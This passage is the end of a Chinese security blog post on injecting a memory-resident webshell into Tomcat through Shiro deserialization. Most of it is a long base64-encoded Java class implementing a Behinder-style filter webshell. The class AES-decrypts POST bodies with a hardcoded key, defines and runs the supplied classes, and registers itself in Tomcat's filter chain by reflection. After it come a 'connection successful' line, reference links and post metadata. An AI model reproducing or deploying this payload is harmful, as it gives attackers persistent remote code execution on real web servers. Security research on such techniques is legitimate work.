i93ZWIvRmlsdGVyRGVmOwEACWZpbHRlck1hcAEAMUxvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlck1hcDsBAAtjb25zdHJ1Y3RvcgEAH0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBADJMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnOwEAAmV4AQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAC1MamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb247AQAhTGphdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb247AQAiTGphdmEvbGFuZy9JbnN0YW50aWF0aW9uRXhjZXB0aW9uOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBAD5MamF2YS9sYW5nL0NsYXNzPCtMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dDs+OwcBIwcA/AcBAAcA4QcBGQcBGgcBGwcBHAcBHQEAClNvdXJjZUZpbGUBABNCZWhpbmRlckZpbHRlci5qYXZhDABkAGUHASQMASUBJgEAEERvIEZpbHRlciAuLi4uLi4HAScMASgBKQEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQwBKgErAQARamF2YS91dGlsL0hhc2hNYXAMASwBLQwBLgEvAQAEUE9TVAcBIwwBMAExAQAQZTQ1ZTMyOWZlYjVkOTI1YgEAAXUHATIMATMBNAEAA0FFUwcBNQwBNgE3AQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwwBOAE5DABkAToMAHgBOwEAFWphdmEubGFuZy5DbGFzc0xvYWRlcgwBPAE9AQALZGVmaW5lQ2xhc3MBAA9qYXZhL2xhbmcvQ2xhc3MHAT4MAT8AiAwBQAFBBwFCDAFDAUQBABZzdW4vbWlzYy9CQVNFNjREZWNvZGVyDAFFAUYHAUcMAUgBLwwBSQFKDAFLAUwMAU0BTgwBTwFQAQAQamF2YS9sYW5nL09iamVjdAwBUQFSDAFTAVQMAVUBVgEAE2phdmEvbGFuZy9FeGNlcHRpb24MAVcAZQcBWAwAfQFZAQAEZXZpbAEAAi8qBwFaDAFbAVwMAV0BUAEAMG9yZy9hcGFjaGUvY2F0YWxpbmEvbG9hZGVyL1dlYmFwcENsYXNzTG9hZGVyQmFzZQwBXgFfBwFgDAFhAWIBAChvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0DAFjAU4MAWQBZQcBZgwBZwFoAQANamF2YS91dGlsL01hcAEALmNvbS9nb3Z1bG4vc2hpcm9hdHRhY2svbWVtc2hlbGwvQmVoaW5kZXJGaWx0ZXIBAC9vcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZgwBaQFqDAFrASkMAWwBLwwBbQEpDAFuAW8BAC9vcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlck1hcAwBcAEpBwFxDAFyAXMMAJ4BLwwBdAEpDAF1AXYBADBvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDb25maWcBABtvcmcvYXBhY2hlL2NhdGFsaW5hL0NvbnRleHQMAXcBeAcBeQwBVQF6AQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgEAIGphdmEvbGFuZy9JbnN0YW50aWF0aW9uRXhjZXB0aW9uAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmF4L3NlcnZsZXQvRmlsdGVyAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAEGphdmEvbGFuZy9TdHJpbmcBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAApnZXRTZXNzaW9uAQAiKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uOwEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAB5qYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb24BAAhwdXRWYWx1ZQEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDspVgEAE2phdmF4L2NyeXB0by9DaXBoZXIBAAtnZXRJbnN0YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAlnZXRSZWFkZXIBABooKUxqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIBAAhyZWFkTGluZQEADGRlY29kZUJ1ZmZlcgEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAAdkb0ZpbmFsAQAGKFtCKVtCAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAOZ2V0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAPcHJpbnRTdGFja1RyYWNlAQAZamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbgEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAMZ2V0UmVzb3VyY2VzAQAnKClMb3JnL2FwYWNoZS9jYXRhbGluYS9XZWJSZXNvdXJjZVJvb3Q7AQAjb3JnL2FwYWNoZS9jYXRhbGluYS9XZWJSZXNvdXJjZVJvb3QBAApnZXRDb250ZXh0AQAfKClMb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0OwEADWdldFN1cGVyY2xhc3MBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACXNldEZpbHRlcgEAGShMamF2YXgvc2VydmxldC9GaWx0ZXI7KVYBAA1zZXRGaWx0ZXJOYW1lAQAHZ2V0TmFtZQEADnNldEZpbHRlckNsYXNzAQAMYWRkRmlsdGVyRGVmAQA0KExvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL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

成功连接

image-20250822235620341

参考文章

https://www.cnblogs.com/yyhuni/p/shiroMemshell.html#1%E4%BB%8Epost%E8%AF%B7%E6%B1%82%E4%BD%93%E4%B8%AD%E5%8F%91%E9%80%81%E5%AD%97%E8%8A%82%E7%A0%81%E6%95%B0%E6%8D%AE

https://l3yx.github.io/2020/07/06/Java%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E4%B8%AD%E7%B1%BB%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD%E7%9A%84%E5%BA%94%E7%94%A8/

https://blog.csdn.net/Thunderclap_/article/details/128932553

java安全
shiro反序列化注入内存马
http://xiaowu5.cn/2025/12/04/shiro反序列化注入内存马/
作者
5
发布于
2025年12月4日
许可协议
BY XIAOWU